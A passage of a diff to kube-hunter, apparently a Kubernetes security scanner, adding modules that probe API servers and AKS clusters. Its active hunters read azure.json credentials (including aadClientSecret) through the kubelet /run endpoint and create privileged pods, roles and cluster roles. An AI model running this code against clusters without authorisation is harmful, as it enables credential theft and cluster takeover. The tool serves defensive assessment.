def execute(self):
|
||||
if self.accesible:
|
||||
self.publish_event(KubeProxyEvent())
|
||||
14
kube_hunter/modules/hunting/__init__.py
Normal file
14
kube_hunter/modules/hunting/__init__.py
Normal file
@@ -0,0 +1,14 @@
|
||||
# flake8: noqa: E402
|
||||
from . import (
|
||||
aks,
|
||||
apiserver,
|
||||
capabilities,
|
||||
certificates,
|
||||
cves,
|
||||
dashboard,
|
||||
etcd,
|
||||
kubelet,
|
||||
mounts,
|
||||
proxy,
|
||||
secrets,
|
||||
)
|
||||
127
kube_hunter/modules/hunting/aks.py
Normal file
127
kube_hunter/modules/hunting/aks.py
Normal file
@@ -0,0 +1,127 @@
|
||||
import os
|
||||
import json
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Event, Vulnerability
|
||||
from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AzureSpnExposure(Vulnerability, Event):
|
||||
"""The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""
|
||||
|
||||
def __init__(self, container, evidence=""):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
Azure,
|
||||
"Azure SPN Exposure",
|
||||
category=MountServicePrincipalTechnique,
|
||||
vid="KHV004",
|
||||
)
|
||||
self.container = container
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
@handler.subscribe(ExposedPodsHandler, predicate=lambda x: x.cloud_type == "Azure")
|
||||
class AzureSpnHunter(Hunter):
|
||||
"""AKS Hunting
|
||||
Hunting Azure cluster deployments using specific known configurations
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.base_url = f"https://{self.event.host}:{self.event.port}"
|
||||
|
||||
# getting a container that has access to the azure.json file
|
||||
def get_key_container(self):
|
||||
logger.debug("Trying to find container with access to azure.json file")
|
||||
|
||||
# pods are saved in the previous event object
|
||||
pods_data = self.event.pods
|
||||
|
||||
suspicious_volume_names = []
|
||||
for pod_data in pods_data:
|
||||
for volume in pod_data["spec"].get("volumes", []):
|
||||
if volume.get("hostPath"):
|
||||
path = volume["hostPath"]["path"]
|
||||
if "/etc/kubernetes/azure.json".startswith(path):
|
||||
suspicious_volume_names.append(volume["name"])
|
||||
for container in pod_data["spec"]["containers"]:
|
||||
for mount in container.get("volumeMounts", []):
|
||||
if mount["name"] in suspicious_volume_names:
|
||||
return {
|
||||
"name": container["name"],
|
||||
"pod": pod_data["metadata"]["name"],
|
||||
"namespace": pod_data["metadata"]["namespace"],
|
||||
"mount": mount,
|
||||
}
|
||||
|
||||
def execute(self):
|
||||
container = self.get_key_container()
|
||||
if container:
|
||||
evidence = f"pod: {container['pod']}, namespace: {container['namespace']}"
|
||||
self.publish_event(AzureSpnExposure(container=container, evidence=evidence))
|
||||
|
||||
|
||||
@handler.subscribe(AzureSpnExposure)
|
||||
class ProveAzureSpnExposure(ActiveHunter):
|
||||
"""Azure SPN Hunter
|
||||
Gets the azure subscription file on the host by executing inside a container
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.base_url = f"https://{self.event.host}:{self.event.port}"
|
||||
|
||||
def test_run_capability(self):
|
||||
"""
|
||||
Uses SecureKubeletPortHunter to test the /run handler
|
||||
TODO: when multiple event subscription is implemented, use this here to make sure /run is accessible
|
||||
"""
|
||||
debug_handlers = SecureKubeletPortHunter.DebugHandlers(path=self.base_url, session=self.event.session, pod=None)
|
||||
return debug_handlers.test_run_container()
|
||||
|
||||
def run(self, command, container):
|
||||
config = get_config()
|
||||
run_url = f"{self.base_url}/run/{container['namespace']}/{container['pod']}/{container['name']}"
|
||||
return self.event.session.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
|
||||
|
||||
def get_full_path_to_azure_file(self):
|
||||
"""
|
||||
Returns a full path to /etc/kubernetes/azure.json
|
||||
Taking into consideration the difference folder of the mount inside the container.
|
||||
TODO: implement the edge case where the mount is to parent /etc folder.
|
||||
"""
|
||||
azure_file_path = self.event.container["mount"]["mountPath"]
|
||||
|
||||
# taking care of cases where a subPath is added to map the specific file
|
||||
if not azure_file_path.endswith("azure.json"):
|
||||
azure_file_path = os.path.join(azure_file_path, "azure.json")
|
||||
|
||||
return azure_file_path
|
||||
|
||||
def execute(self):
|
||||
if not self.test_run_capability():
|
||||
logger.debug("Not proving AzureSpnExposure because /run debug handler is disabled")
|
||||
return
|
||||
|
||||
try:
|
||||
azure_file_path = self.get_full_path_to_azure_file()
|
||||
logger.debug(f"trying to access the azure.json at the resolved path: {azure_file_path}")
|
||||
subscription = self.run(f"cat {azure_file_path}", container=self.event.container).json()
|
||||
except requests.Timeout:
|
||||
logger.debug("failed to run command in container", exc_info=True)
|
||||
except json.decoder.JSONDecodeError:
|
||||
logger.warning("failed to parse SPN")
|
||||
else:
|
||||
if "subscriptionId" in subscription:
|
||||
self.event.subscriptionId = subscription["subscriptionId"]
|
||||
self.event.aadClientId = subscription["aadClientId"]
|
||||
self.event.aadClientSecret = subscription["aadClientSecret"]
|
||||
self.event.tenantId = subscription["tenantId"]
|
||||
self.event.evidence = f"subscription: {self.event.subscriptionId}"
|
||||
648
kube_hunter/modules/hunting/apiserver.py
Normal file
648
kube_hunter/modules/hunting/apiserver.py
Normal file
@@ -0,0 +1,648 @@
|
||||
import logging
|
||||
import json
|
||||
import uuid
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.modules.discovery.apiserver import ApiServer
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
|
||||
from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster
|
||||
from kube_hunter.core.types.vulnerabilities import (
|
||||
AccessK8sApiServerTechnique,
|
||||
ExposedSensitiveInterfacesTechnique,
|
||||
GeneralDefenseEvasionTechnique,
|
||||
DataDestructionTechnique,
|
||||
ClusterAdminBindingTechnique,
|
||||
NewContainerTechnique,
|
||||
PrivilegedContainerTechnique,
|
||||
SidecarInjectionTechnique,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ServerApiAccess(Vulnerability, Event):
|
||||
"""The API Server port is accessible.
|
||||
Depending on your RBAC settings this could expose access to or control of your cluster."""
|
||||
|
||||
def __init__(self, evidence, using_token):
|
||||
if using_token:
|
||||
name = "Access to API using service account token"
|
||||
category = AccessK8sApiServerTechnique
|
||||
else:
|
||||
name = "Unauthenticated access to API"
|
||||
category = ExposedSensitiveInterfacesTechnique
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV005",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ServerApiHTTPAccess(Vulnerability, Event):
|
||||
"""The API Server port is accessible over HTTP, and therefore unencrypted.
|
||||
Depending on your RBAC settings this could expose access to or control of your cluster."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
name = "Insecure (HTTP) access to API"
|
||||
category = ExposedSensitiveInterfacesTechnique
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV006",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ApiInfoDisclosure(Vulnerability, Event):
|
||||
"""Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup"""
|
||||
|
||||
def __init__(self, evidence, using_token, name):
|
||||
category = AccessK8sApiServerTechnique
|
||||
if using_token:
|
||||
name += " using default service account token"
|
||||
else:
|
||||
name += " as anonymous user"
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV007",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ListPodsAndNamespaces(ApiInfoDisclosure):
|
||||
"""Accessing pods might give an attacker valuable information"""
|
||||
|
||||
def __init__(self, evidence, using_token):
|
||||
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing pods")
|
||||
|
||||
|
||||
class ListNamespaces(ApiInfoDisclosure):
|
||||
"""Accessing namespaces might give an attacker valuable information"""
|
||||
|
||||
def __init__(self, evidence, using_token):
|
||||
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing namespaces")
|
||||
|
||||
|
||||
class ListRoles(ApiInfoDisclosure):
|
||||
"""Accessing roles might give an attacker valuable information"""
|
||||
|
||||
def __init__(self, evidence, using_token):
|
||||
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing roles")
|
||||
|
||||
|
||||
class ListClusterRoles(ApiInfoDisclosure):
|
||||
"""Accessing cluster roles might give an attacker valuable information"""
|
||||
|
||||
def __init__(self, evidence, using_token):
|
||||
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing cluster roles")
|
||||
|
||||
|
||||
class CreateANamespace(Vulnerability, Event):
|
||||
|
||||
"""Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created a namespace",
|
||||
category=GeneralDefenseEvasionTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class DeleteANamespace(Vulnerability, Event):
|
||||
|
||||
"""Deleting a namespace might give an attacker the option to affect application behavior"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Delete a namespace",
|
||||
category=DataDestructionTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class CreateARole(Vulnerability, Event):
|
||||
"""Creating a role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
within the specified namespaces.
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=GeneralDefenseEvasionTechnique)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class CreateAClusterRole(Vulnerability, Event):
|
||||
"""Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
across the whole cluster
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created a cluster role",
|
||||
category=ClusterAdminBindingTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PatchARole(Vulnerability, Event):
|
||||
"""Patching a role might give an attacker the option to create new pods with custom roles within the
|
||||
specific role's namespace scope
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched a role",
|
||||
category=ClusterAdminBindingTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PatchAClusterRole(Vulnerability, Event):
|
||||
"""Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
|
||||
cluster scope.
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched a cluster role",
|
||||
category=ClusterAdminBindingTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class DeleteARole(Vulnerability, Event):
|
||||
"""Deleting a role might allow an attacker to affect access to resources in the namespace"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted a role",
|
||||
category=DataDestructionTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class DeleteAClusterRole(Vulnerability, Event):
|
||||
"""Deleting a cluster role might allow an attacker to affect access to resources in the cluster"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted a cluster role",
|
||||
category=DataDestructionTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class CreateAPod(Vulnerability, Event):
|
||||
"""Creating a new pod allows an attacker to run custom code"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created A Pod",
|
||||
category=NewContainerTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class CreateAPrivilegedPod(Vulnerability, Event):
|
||||
"""Creating a new PRIVILEGED pod would gain an attacker FULL CONTROL over the cluster"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created A PRIVILEGED Pod",
|
||||
category=PrivilegedContainerTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PatchAPod(Vulnerability, Event):
|
||||
"""Patching a pod allows an attacker to compromise and control it"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched A Pod",
|
||||
category=SidecarInjectionTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class DeleteAPod(Vulnerability, Event):
|
||||
"""Deleting a pod allows an attacker to disturb applications on the cluster"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted A Pod",
|
||||
category=DataDestructionTechnique,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ApiServerPassiveHunterFinished(Event):
|
||||
def __init__(self, namespaces):
|
||||
self.namespaces = namespaces
|
||||
|
||||
|
||||
# This Hunter checks what happens if we try to access the API Server without a service account token
|
||||
# If we have a service account token we'll also trigger AccessApiServerWithToken below
|
||||
@handler.subscribe(ApiServer)
|
||||
class AccessApiServer(Hunter):
|
||||
"""API Server Hunter
|
||||
Checks if API server is accessible
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
|
||||
self.headers = {}
|
||||
self.with_token = False
|
||||
|
||||
def access_api_server(self):
|
||||
config = get_config()
|
||||
logger.debug(f"Passive Hunter is attempting to access the API at {self.path}")
|
||||
try:
|
||||
r = requests.get(f"{self.path}/api", headers=self.headers, verify=False, timeout=config.network_timeout)
|
||||
if r.status_code == 200 and r.content:
|
||||
return r.content
|
||||
except requests.exceptions.ConnectionError:
|
||||
pass
|
||||
return False
|
||||
|
||||
def get_items(self, path):
|
||||
config = get_config()
|
||||
try:
|
||||
items = []
|
||||
r = requests.get(path, headers=self.headers, verify=False, timeout=config.network_timeout)
|
||||
if r.status_code == 200:
|
||||
resp = json.loads(r.content)
|
||||
for item in resp["items"]:
|
||||
items.append(item["metadata"]["name"])
|
||||
return items
|
||||
logger.debug(f"Got HTTP {r.status_code} respone: {r.text}")
|
||||
except (requests.exceptions.ConnectionError, KeyError):
|
||||
logger.debug(f"Failed retrieving items from API server at {path}")
|
||||
|
||||
return None
|
||||
|
||||
def get_pods(self, namespace=None):
|
||||
config = get_config()
|
||||
pods = []
|
||||
try:
|
||||
if not namespace:
|
||||
r = requests.get(
|
||||
f"{self.path}/api/v1/pods",
|
||||
headers=self.headers,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
else:
|
||||
r = requests.get(
|
||||
f"{self.path}/api/v1/namespaces/{namespace}/pods",
|
||||
headers=self.headers,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
if r.status_code == 200:
|
||||
resp = json.loads(r.content)
|
||||
for item in resp["items"]:
|
||||
name = item["metadata"]["name"].encode("ascii", "ignore")
|
||||
namespace = item["metadata"]["namespace"].encode("ascii", "ignore")
|
||||
pods.append({"name": name, "namespace": namespace})
|
||||
return pods
|
||||
except (requests.exceptions.ConnectionError, KeyError):
|
||||
pass
|
||||
return None
|
||||
|
||||
def execute(self):
|
||||
api = self.access_api_server()
|
||||
if api:
|
||||
if self.event.protocol == "http":
|
||||
self.publish_event(ServerApiHTTPAccess(api))
|
||||
else:
|
||||
self.publish_event(ServerApiAccess(api, self.with_token))
|
||||
|
||||
namespaces = self.get_items(f"{self.path}/api/v1/namespaces")
|
||||
if namespaces:
|
||||
self.publish_event(ListNamespaces(namespaces, self.with_token))
|
||||
|
||||
roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/roles")
|
||||
if roles:
|
||||
self.publish_event(ListRoles(roles, self.with_token))
|
||||
|
||||
cluster_roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles")
|
||||
if cluster_roles:
|
||||
self.publish_event(ListClusterRoles(cluster_roles, self.with_token))
|
||||
|
||||
pods = self.get_pods()
|
||||
if pods:
|
||||
self.publish_event(ListPodsAndNamespaces(pods, self.with_token))
|
||||
|
||||
# If we have a service account token, this event should get triggered twice - once with and once without
|
||||
# the token
|
||||
self.publish_event(ApiServerPassiveHunterFinished(namespaces))
|
||||
|
||||
|
||||
@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
|
||||
class AccessApiServerWithToken(AccessApiServer):
|
||||
"""API Server Hunter
|
||||
Accessing the API server using the service account token obtained from a compromised pod
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
super().__init__(event)
|
||||
assert self.event.auth_token
|
||||
self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
|
||||
self.category = AccessK8sApiServerTechnique
|
||||
self.with_token = True
|
||||
|
||||
|
||||
# Active Hunter
|
||||
@handler.subscribe(ApiServerPassiveHunterFinished)
|
||||
class AccessApiServerActive(ActiveHunter):
|
||||
"""API server hunter
|
||||
Accessing the api server might grant an attacker full control over the cluster
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
|
||||
|
||||
def create_item(self, path, data):
|
||||
config = get_config()
|
||||
headers = {"Content-Type": "application/json"}
|
||||
if self.event.auth_token:
|
||||
headers["Authorization"] = f"Bearer {self.event.auth_token}"
|
||||
|
||||
try:
|
||||
res = requests.post(path, verify=False, data=data, headers=headers, timeout=config.network_timeout)
|
||||
if res.status_code in [200, 201, 202]:
|
||||
parsed_content = json.loads(res.content)
|
||||
return parsed_content["metadata"]["name"]
|
||||
except (requests.exceptions.ConnectionError, KeyError):
|
||||
pass
|
||||
return None
|
||||
|
||||
def patch_item(self, path, data):
|
||||
config = get_config()
|
||||
headers = {"Content-Type": "application/json-patch+json"}
|
||||
if self.event.auth_token:
|
||||
headers["Authorization"] = f"Bearer {self.event.auth_token}"
|
||||
try:
|
||||
res = requests.patch(path, headers=headers, verify=False, data=data, timeout=config.network_timeout)
|
||||
if res.status_code not in [200, 201, 202]:
|
||||
return None
|
||||
parsed_content = json.loads(res.content)
|
||||
# TODO is there a patch timestamp we could use?
|
||||
return parsed_content["metadata"]["namespace"]
|
||||
except (requests.exceptions.ConnectionError, KeyError):
|
||||
pass
|
||||
return None
|
||||
|
||||
def delete_item(self, path):
|
||||
config = get_config()
|
||||
headers = {}
|
||||
if self.event.auth_token:
|
||||
headers["Authorization"] = f"Bearer {self.event.auth_token}"
|
||||
try:
|
||||
res = requests.delete(path, headers=headers, verify=False, timeout=config.network_timeout)
|
||||
if res.status_code in [200, 201, 202]:
|
||||
parsed_content = json.loads(res.content)
|
||||
return parsed_content["metadata"]["deletionTimestamp"]
|
||||
except (requests.exceptions.ConnectionError, KeyError):
|
||||
pass
|
||||
return None
|
||||
|
||||
def create_a_pod(self, namespace, is_privileged):
|
||||
privileged_value = {"securityContext": {"privileged": True}} if is_privileged else {}
|
||||
random_name = str(uuid.uuid4())[0:5]
|
||||
pod = {
|
||||
"apiVersion": "v1",
|
||||
"kind": "Pod",
|
||||
"metadata": {"name": random_name},
|
||||
"spec": {
|
||||
"containers": [
|
||||
{"name": random_name, "image": "nginx:1.7.9", "ports": [{"containerPort": 80}], **privileged_value}
|
||||
]
|
||||
},
|
||||
}
|
||||
return self.create_item(path=f"{self.path}/api/v1/namespaces/{namespace}/pods", data=json.dumps(pod))
|
||||
|
||||
def delete_a_pod(self, namespace, pod_name):
|
||||
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}")
|
||||
if not delete_timestamp:
|
||||
logger.error(f"Created pod {pod_name} in namespace {namespace} but unable to delete it")
|
||||
return delete_timestamp
|
||||
|
||||
def patch_a_pod(self, namespace, pod_name):
|
||||
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
|
||||
return self.patch_item(
|
||||
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
|
||||
data=json.dumps(data),
|
||||
)
|
||||
|
||||
def create_namespace(self):
|
||||
random_name = (str(uuid.uuid4()))[0:5]
|
||||
data = {
|
||||
"kind": "Namespace",
|
||||
"apiVersion": "v1",
|
||||
"metadata": {"name": random_name, "labels": {"name": random_name}},
|
||||
}
|
||||
return self.create_item(path=f"{self.path}/api/v1/namespaces", data=json.dumps(data))
|
||||
|
||||
def delete_namespace(self, namespace):
|
||||
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}")
|
||||
if delete_timestamp is None:
|
||||
logger.error(f"Created namespace {namespace} but failed to delete it")
|
||||
return delete_timestamp
|
||||
|
||||
def create_a_role(self, namespace):
|
||||
name = str(uuid.uuid4())[0:5]
|
||||
role = {
|
||||
"kind": "Role",
|
||||
"apiVersion": "rbac.authorization.k8s.io/v1",
|
||||
"metadata": {"namespace": namespace, "name": name},
|
||||
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
|
||||
}
|
||||
return self.create_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles",
|
||||
data=json.dumps(role),
|
||||
)
|
||||
|
||||
def create_a_cluster_role(self):
|
||||
name = str(uuid.uuid4())[0:5]
|
||||
cluster_role = {
|
||||
"kind": "ClusterRole",
|
||||
"apiVersion": "rbac.authorization.k8s.io/v1",
|
||||
"metadata": {"name": name},
|
||||
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
|
||||
}
|
||||
return self.create_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles",
|
||||
data=json.dumps(cluster_role),
|
||||
)
|
||||
|
||||
def delete_a_role(self, namespace, name):
|
||||
delete_timestamp = self.delete_item(
|
||||
f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{name}"
|
||||
)
|
||||
if delete_timestamp is None:
|
||||
logger.error(f"Created role {name} in namespace {namespace} but unable to delete it")
|
||||
return delete_timestamp
|
||||
|
||||
def delete_a_cluster_role(self, name):
|
||||
delete_timestamp = self.delete_item(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{name}")
|
||||
if delete_timestamp is None:
|
||||
logger.error(f"Created cluster role {name} but unable to delete it")
|
||||
return delete_timestamp
|
||||
|
||||
def patch_a_role(self, namespace, role):
|
||||
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
|
||||
return self.patch_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{role}",
|
||||
data=json.dumps(data),
|
||||
)
|
||||
|
||||
def patch_a_cluster_role(self, cluster_role):
|
||||
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
|
||||
return self.patch_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}",
|
||||
data=json.dumps(data),
|
||||
)
|
||||
|
||||
def execute(self):
|
||||
# Try creating cluster-wide objects
|
||||
namespace = self.create_namespace()
|
||||
if namespace:
|
||||
self.publish_event(CreateANamespace(f"new namespace name: {namespace}"))
|
||||
delete_timestamp = self.delete_namespace(namespace)
|
||||
if delete_timestamp:
|
||||
self.publish_event(DeleteANamespace(delete_timestamp))
|
||||
|
||||
cluster_role = self.create_a_cluster_role()
|
||||
if cluster_role:
|
||||
self.publish_event(CreateAClusterRole(f"Cluster role name: {cluster_role}"))
|
||||
|
||||
patch_evidence = self.patch_a_cluster_role(cluster_role)
|
||||
if patch_evidence:
|
||||
self.publish_event(
|
||||
PatchAClusterRole(f"Patched Cluster Role Name: {cluster_role} Patch evidence: {patch_evidence}")
|
||||
)
|
||||
|
||||
delete_timestamp = self.delete_a_cluster_role(cluster_role)
|
||||
if delete_timestamp:
|
||||
self.publish_event(DeleteAClusterRole(f"Cluster role {cluster_role} deletion time {delete_timestamp}"))
|
||||
|
||||
# Try attacking all the namespaces we know about
|
||||
if self.event.namespaces:
|
||||
for namespace in self.event.namespaces:
|
||||
# Try creating and deleting a privileged pod
|
||||
pod_name = self.create_a_pod(namespace, True)
|
||||
if pod_name:
|
||||
self.publish_event(CreateAPrivilegedPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
|
||||
delete_time = self.delete_a_pod(namespace, pod_name)
|
||||
if delete_time:
|
||||
self.publish_event(DeleteAPod(f"Pod Name: {pod_name} Deletion time: {delete_time}"))
|
||||
|
||||
# Try creating, patching and deleting an unprivileged pod
|
||||
pod_name = self.create_a_pod(namespace, False)
|
||||
if pod_name:
|
||||
self.publish_event(CreateAPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
|
||||
|
||||
patch_evidence = self.patch_a_pod(namespace, pod_name)
|
||||
if patch_evidence:
|
||||
self.publish_event(
|
||||
PatchAPod(
|
||||
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Patch evidence: {patch_evidence}"
|
||||
)
|
||||
)
|
||||
|
||||
delete_time = self.delete_a_pod(namespace, pod_name)
|
||||
if delete_time:
|
||||
self.publish_event(
|
||||
DeleteAPod(
|
||||
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
|
||||
)
|
||||
)
|
||||
|
||||
role = self.create_a_role(namespace)
|
||||
if role:
|
||||
self.publish_event(CreateARole(f"Role name: {role}"))
|
||||
|
||||
patch_evidence = self.patch_a_role(namespace, role)
|
||||
if patch_evidence:
|
||||
self.publish_event(
|
||||
PatchARole(
|
||||
f"Patched Role Name: {role} "
|
||||
f"Namespace: {namespace} "
|
||||
f"Patch evidence: {patch_evidence}"
|
||||
)
|
||||
)
|
||||
|
||||
delete_time = self.delete_a_role(namespace, role)
|
||||
if delete_time:
|
||||
self.publish_event(
|
||||
DeleteARole(
|
||||
f"Deleted role: {role} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
|
||||
)
|
||||
)
|
||||
|
||||
# Note: we are not binding any role or cluster role because
|
||||
# in certain cases it might effect the running pod within the cluster (and we don't want to do that).
|
||||
|
||||
|
||||
@handler.subscribe(ApiServer)
|
||||
class ApiVersionHunter(Hunter):
|
||||
"""Api Version Hunter
|
||||
Tries to obtain the Api Server's version directly from /version endpoint
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
|
||||
self.session = requests.Session()
|
||||
self.session.verify = False
|
||||
if self.event.auth_token:
|
||||
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
if self.event.auth_token:
|
||||
logger.debug(
|
||||
"Trying to access the API server version endpoint using pod's"
|
||||
f" service account token on {self.event.host}:{self.event.port} \t"
|
||||
)
|
||||
else:
|
||||
logger.debug("Trying to access the API server version endpoint anonymously")
|
||||
version = self.session.get(f"{self.path}/version", timeout=config.network_timeout).json()["gitVersion"]
|
||||
logger.debug(f"Discovered version of api server {version}")
|
||||
self.publish_event(K8sVersionDisclosure(version=version, from_endpoint="/version"))
|
||||
49
kube_hunter/modules/hunting/capabilities.py
Normal file
49
kube_hunter/modules/hunting/capabilities.py
Normal file
@@ -0,0 +1,49 @@
|
||||
import socket
|
||||
import logging
|
||||
|
||||
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Event, Vulnerability
|
||||
from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CapNetRawEnabled(Event, Vulnerability):
|
||||
"""CAP_NET_RAW is enabled by default for pods.
|
||||
If an attacker manages to compromise a pod,
|
||||
they could potentially take advantage of this capability to perform network
|
||||
attacks on other pods running on the same node"""
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="CAP_NET_RAW Enabled",
|
||||
category=ARPPoisoningTechnique,
|
||||
)
|
||||
|
||||
|
||||
@handler.subscribe(RunningAsPodEvent)
|
||||
class PodCapabilitiesHunter(Hunter):
|
||||
"""Pod Capabilities Hunter
|
||||
Checks for default enabled capabilities in a pod
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def check_net_raw(self):
|
||||
logger.debug("Passive hunter's trying to open a RAW socket")
|
||||
try:
|
||||
# trying to open a raw socket without CAP_NET_RAW will raise PermissionsError
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
|
||||
s.close()
|
